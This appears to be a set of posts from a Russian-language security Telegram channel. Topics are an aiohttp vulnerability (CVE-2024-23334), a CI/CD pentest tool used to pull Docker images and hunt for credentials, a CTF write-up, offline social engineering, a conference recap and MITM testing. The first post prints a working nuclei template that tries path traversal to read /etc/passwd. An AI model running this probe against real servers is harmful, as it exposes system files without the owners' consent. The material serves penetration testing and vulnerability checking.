🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓
#CVE #python #red_team

Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

❤️ Шаблон для nuclei

id: "aiohttp"

info:
  name: aiohttp LFI
  author: crth0
  severity: high
  description: CVE-2024-23334 Check LFI.
  reference:
    - https://github.com/jhonnybonny
  classification:
  tags: aiohttp,LFI,CVE-2024-23334


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../etc/passwd'
      - '{{BaseURL}}/static/../../etc/passwd'
      - '{{BaseURL}}/static/../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
        condition: and

по сути даже шаблона не нужно, тут обычный path traversal

🔓 Читать далее

❤️ PoC

🌚 @poxek

👍 Тэк, есть 2 новости. Плохая и хорошая. Выпьем за хорошую и закусим плохой.
#AMA #менторство

Хорошая новость в том, что у меня всё таки дотянулись руки доделать монтаж по AMA эфиру. Давно обещал, но только вот сделал. В телегу нативно выложить не смог, т.к. запись эфира весит 12 гб (2 часа 5 минут). И дабы не было проблем с авторскими правами на музыку из Яндекс Музыки решил на стриминговые площадки не заливать. На будущее учту это. Поэтому залил туда, где качество не зашакалиться при скачивании:

➡️ Скачать/посмотреть эфир

Плохая новость касается набора на менторство, заявок поступило более 50!! мы не ожидали, что будет столько желающих. Выбрали самых интересных на основе того, что вы писали в заявках. К сожалению многие по итогу сливались из-за того, что были не готовы платить приемлемые деньги за полугодовое обучение. Поэтому для тех, кто ещё думает или копит чеканные монеты будет следующий продут от меня через полгода +-. Так что ждите анонсов. Вчера был первый урок по менторству, полёт отличный 😏

📌 Stay tuned!

🔺 Ускоряем пентест CI/CD

Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.

В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:

🔵 Репозитории исходного кода (Gitlab, Gitea)

🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog)

🔵 Серверы автоматизации (Gitlab-CI, Jenkins)

🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили).

⏱ Перспективы копать именно под CI/CD: Возможности и проблемы

Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации.

Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)

📕

Пример таких уязвимостей:

CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК

Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.

😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD

💻 Сразу ссылка на инструмент — ТЫК

Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился).

Модули Epyon охватывают широкий спектр, включая:

1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise

✏️ Перейдем к тестам

Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).

Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.

Пример: HTTP API Docker Registry.

Команда epyon registry может быть использована для взаимодействия с реестром Docker:

Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:

⏩ Шаг 01: Получить список образов

Опция list-images может быть использована для перечисления всех образов контейнеров.

⏩ Шаг 02: Получить теги для каждого образа

Опция list-tags получит все доступные теги для каждого образа.

⏩ Шаг 03: Скачать образы контейнеров

Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).

⏩ Шаг 04: Поиск учетных данных

Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.

🥂 Profit

Вот нами уже и найдены login/pass, api key и много других критически важных артефактов

🛡 Заключение

В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.

#redteam

Tinkoff CTF 2024: разбор демозадания

CTF — соревнования по спортивному хакингу: как олимпиадное программирование, но в информационной безопасности. Команды получают набор заданий на криптографию, анализ скомпилированного кода, веб-уязвимости и не только — на все те направления, с которыми работают профессионалы-безопасники.

Мы сделали соревнования в двух лигах: для опытных и новичков в CTF — тех, кто не специализируется на информационной безопасности и участвует в таком формате впервые. Под новичками имеем в виду опытных разработчиков, SRE- и QA-инженеров, аналитиков и других ИТ-специалистов.

Ребята из Тинькофф написали интересную статью про разбор демо таска с пентестом мобильного приложения. Получилось занимательно)

📌 Читать далее

🌚 @poxek

🔓 Go offline. Используем социальную инженерию в реальном мире 🔓

Са­мая зах­ватыва­ющая и роман­тизиро­ван­ная часть соци­аль­ной инже­нерии — это, конеч­но, офлайн‑ата­ки. Фишинг по элек­трон­ной поч­те — инте­рес­ный про­цесс, но в офлай­не пен­тестер по‑нас­тояще­му рас­кры­вает­ся как твор­ческая лич­ность. Вот об этой сто­роне искусс­тва соци­аль­ной инже­нерии мы сегод­ня и погово­рим, раз­берем прак­тичес­кие методы работы пен­тесте­ра в офлай­не, а так­же обсу­дим при­меры успешных атак.

С вос­хищени­ем мы слу­шаем исто­рии о том, как пен­тесте­ры готовят­ся к ата­ке, при­думы­вая под­ходящую леген­ду. Нап­ример, выда­ют себя за устра­ивающе­гося на работу соис­кателя, под­делыва­ют про­пуск, а потом про­ника­ют в периметр орга­низа­ции, под­клю­чают­ся к внут­ренней сети, химичат в сер­верной, рас­кле­ивают пла­каты с QR-кодами или прос­то раз­бра­сыва­ют флеш­ки с «сюр­при­зом». В этой статье мы раз­берем при­меры таких атак. Нес­коль­ко из них будут поза­имс­тво­ваны из моей кни­ги «Кон­тро­лиру­емый взлом. Биб­лия соци­аль­ной инже­нерии», кро­ме них, рас­смот­рим ряд дру­гих при­меров из интерне­та.

🔓 Читать далее

😹 @poxek

Stay safe ❤️

Конференция goCloud от Cloud
Проходило сие действие в ЦДП (Центральный Дом Предпринимателя). Прекрасная локация, довелось в ней пару раз повыступать и очень много раз посещать в прошлом. Много вкусной еды, конференция шла с утра до вечера. Успели и наесться, и выпить :D Сидр был вкусный 🌚

На фото @kerzaster и @belka_e. Спасибо ребятам, за Успенскую компанию на конфе. У нас ещё в планах на след неделе посетить пару митапов и пару в начале апреля. Так что ждите 🤟

Доклады были ± норм, какие-то совсем бред или ни о чем, но было пару, которые было полезно и интересно слушать

Организация была на очень хорошем уровне, хотя в ЦДП не помню, чтобы было плохо) а также вход был бесплатный, получилось пообщаться с редактором Хабр вживую и ещё с парой весёлых людей, нетворинг входил в чат)

Спасибо команде Cloud.ru за эволюшен организацию! Зовите и пишите в будущем))

🌚 @poxek

🔓 Code 27. Пентестим сети с наименьшим ущербом 🔓
#сети #red_team

MITM — это самая импак­тная ата­ка, которую мож­но про­вес­ти в сети. Но одновре­мен­но это и самая опас­ная тех­ника с точ­ки зре­ния рис­ков для инфраструк­туры. В этой статье Магама рас­ска­жет о том, как спу­фить при пен­тесте, что­бы ничего не сло­мать по дороге и не устро­ить DoS.

Нач­нем с теории. Магама показал, какие парамет­ры нуж­ны для кор­рек­тно­го про­веде­ния MITM. Эти нас­трой­ки поз­волят вам избе­жать неп­редна­мерен­ного DoS.

🔓 Читать далее

🌚 @poxek